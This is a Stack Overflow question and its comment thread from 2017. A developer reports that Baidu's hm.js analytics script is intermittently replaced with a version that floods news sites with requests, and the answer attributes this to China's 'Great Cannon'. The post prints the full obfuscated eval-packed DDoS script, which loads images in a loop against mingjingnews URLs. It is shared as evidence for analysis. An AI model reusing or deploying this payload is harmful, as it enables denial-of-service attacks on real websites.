What is randomly replacing Baidu TongJi (Analytics)'s Javascript code to make DDOS attack on websites on browser?

Question

Update:

It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.

This is the hm.js that has been modified to launch DDOS:

// the following code launches DDOS against sites like mingjingnews.com

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    }
    ;
    if (!''.replace(/^/, String)) {
        while (c--)
            d[e(c)] = k[c] || e(c);
        k = [function(e) {
            return d[e]
        }
        ];
        e = function() {
            return '\\w+'
        }
        ;
        c = 1;
    }
    ;while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
    return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))

Compare this to the original hm.js code, where no DDOS is present.

Both of these 2 hm.js libraries are coming from the exact same address.

I have a site that uses Baidu TongJi (Analytics). Like most other javascript libraries, it is done through injecting a line of Javascript to the HTML.

module.exports = function(id) {
if (!id) {
    throw new Error('请填写百度统计id');
}
    var elm = document.createElement('script');
    elm.src = '//hm.baidu.com/hm.js?' + id;
    var body = document.getElementsByTagName('body')[0];
    body.appendChild(elm);
}

To my horror, once it has initialised, my browser's console and network screen is flood with around 3000+ network requests to Ming Jing News (fake news according to Chinese's communist government) in just 100 seconds... and it kept going until I stopped it.

I am starting to think this is similar to the last time the great wall of china was used to launch attacks to GitHub using Baidu's CDN.

I am currently calling Baidu from outside of the China and I am wondering if this is normal... Will the people inside China be spared from this?

@CodyGray less on programming, more about internet security and internet in China... and using Baidu services from outside of China? — williamli, Aug 25 '17 at 14:38
Yeah, that was my concern (and some other users who flagged your question). Stack Overflow only deals with programming questions, so I'm not sure if this is a good fit for our site. It's obviously been an interesting question to a number of people, but I'm not sure where else it might be appropriate. — Cody Gray - on strike, Aug 25 '17 at 14:45
@CodyGray Beside programming questions, I think network / security questions are also allowed here in Stackoverflow. Right now on the right sidebar, Stackoverflow is showing me related questions about Baidu / Google analytics, DDOS as well as a full category of "Hot Network Questions". — williamli, Aug 25 '17 at 14:57
@williamli - the "related" questions are all programing related. The "hot network questions" are from other sites in the Stack Exchange network. Each of those sites covers different topics than Stack Overflow. For example, this is probably a better fit over on [IT Security](https://security.stackexchange.com) but it needs a clearer question first. While interesting, I don't really see an answerable question in this post. It's mostly just calling for speculation about who an unknown actor is and we'd just be guessing at that too. — AJ Henderson, Aug 25 '17 at 15:01
Main problem I see with this question is to understand what is replacing the .js, could be a whole bunch of reasons and hacks (could be your site being compromised and not an external provider)... hard to know/ensure/cross-validate to know. — Tensibai, Aug 25 '17 at 15:02
@Tensibai it was not related to my site. I finally traced it down to the actual Baidu Analytics JS library that my site uses. From time to time, the code downloaded from their server will be completely different with instructions to launch DDOS attack on a number of sites. After a few refresh, the JS library code will become normal again. I managed to copied down 2 version of the hm.js served by the Baidu CDN. https://gist.github.com/williamli/223033fd95179d966fd2b4ce4543cfbb — williamli, Aug 25 '17 at 15:06
@williamli the code you're downloading is different, I can't tell if I can be sure you're really downloading from Baidu server or if your workstation is compromised in some way, where a botnet could override DNS information to make your browser get an attack lib instead (one in many way for the sake of exemple) — Tensibai, Aug 25 '17 at 15:08
@Tensibai what do you think I can do to see where the attack came from? I can try and find the actual IP the code was pulled from. — williamli, Aug 25 '17 at 15:10
Is there a possibility of loading the js via https? Checking the SSL cert (and signing authority) for the provider of the information would allow tieing it directly to Baidu, but without that, it could be anyone along the way. — AJ Henderson, Aug 25 '17 at 15:12
@AJHenderson good suggestion. let me force it to use https and see — williamli, Aug 25 '17 at 15:13
I can't repro, I assume the id is specific to your site and the lib doesn't download without a valid one (I get 0 length responses only trying to download it) — Tensibai, Aug 25 '17 at 15:16
@AJHenderson Right now everything seems fine. They only replace my hm.js (baidu) code from time to time and it seems they are not in attack mode right now. I will post back here once my code is beginning swapped again and then I will try to get SSL / IP info and will try enforcing a https connection. — williamli, Aug 25 '17 at 15:23

score 10 · Accepted Answer · edited Aug 25 '17 at 15:44

10

As suggested by a now deleted answer by kos, this is is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".

Details are available on Brian Krebs's security blog.

edited Aug 25 '17 at 15:44

Cody Gray - on strike

239,200
50
490
574

answered Aug 25 '17 at 15:03

williamli

3,846
1
18
30

What is randomly replacing Baidu TongJi (Analytics)'s Javascript code to make DDOS attack on websites on browser?

1 Answers1